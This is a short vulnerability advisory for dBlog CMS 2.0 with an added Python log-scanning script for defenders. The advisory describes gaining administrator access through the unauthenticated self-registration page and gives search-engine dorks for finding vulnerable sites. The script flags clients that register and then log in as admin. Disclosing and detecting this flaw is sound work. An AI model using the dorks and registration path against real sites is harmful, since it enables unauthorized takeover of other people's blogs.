dBlog CMS v2.0 Remote Arbitrary Admin Access Vulnerability

2010-06-07 14:01:59

# Title: dBlog 2.0 CMS Open Source - Administrator Panel
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PoisonCode
# Published: 2010-06-02
# Software: http://www.dblog.it/sito/gateway.asp?f=dblog_v20f.zip
# Version: 2.0
# Platform: asp


PanamaSecurity.blogspot.com


Dorks

intext: "powered by dBlog CMS"
allinurl: /dblog/admin/articoli_elenco.asp

Exploit: www.victima.com/dblog/autoregistrazione/autori_aggiungi.asp

Panel: /dblog/admin/login.asp

We enter the administration panel.

Fill in the data and click Accept.

We enter the panel, log in, and that's it: we are now admin.
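
For defenders, a log check for the sequence described above, as an added example that is not part of the original advisory: it scans IIS W3C logs for a client that requests the self-registration page and then the admin login page. The log layout, the sample lines, the 30-minute window and the function names are assumptions made for this example.

```python
from datetime import datetime, timedelta

# Paths from the advisory, matched as lowercase suffixes: the install
# directory may differ and IIS treats paths case-insensitively.
REGISTER = "/autoregistrazione/autori_aggiungi.asp"
LOGIN = "/admin/login.asp"

# Constructed sample log (IIS W3C extended format), not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2010-06-03 08:00:00 POST /dblog/autoregistrazione/autori_aggiungi.asp 192.0.2.5 200
2010-06-03 10:00:01 GET /dblog/default.asp 198.51.100.7 200
2010-06-03 10:02:10 GET /dblog/autoregistrazione/autori_aggiungi.asp 203.0.113.9 200
2010-06-03 10:02:41 POST /dblog/Autoregistrazione/Autori_Aggiungi.asp 203.0.113.9 302
2010-06-03 10:03:05 POST /dblog/admin/login.asp 203.0.113.9 302
2010-06-03 11:15:00 POST /dblog/admin/login.asp 198.51.100.7 302
2010-06-03 12:00:00 GET /dblog/admin/login.asp 192.0.2.5 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                          "%Y-%m-%d %H:%M:%S")
            yield row


def find_self_registered_logins(lines, window=timedelta(minutes=30)):
    """Return (ip, registered_at, login_at) for each client that requested the
    self-registration page and then the admin login page within `window`.
    Assumes the log is in chronological order, as IIS writes it."""
    registered = {}   # client IP -> time of its latest registration request
    hits = []
    for r in parse_w3c(lines):
        stem, ip = r.get("cs-uri-stem", "").lower(), r.get("c-ip")
        if stem.endswith(REGISTER):
            registered[ip] = r["ts"]
        elif stem.endswith(LOGIN) and ip in registered:
            if r["ts"] - registered[ip] <= window:
                hits.append((ip, registered[ip], r["ts"]))
    return hits
```

Each hit is a triage lead: compare the flagged time against the authors stored in the dBlog database to see which account was created.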

Fixes

No fixes
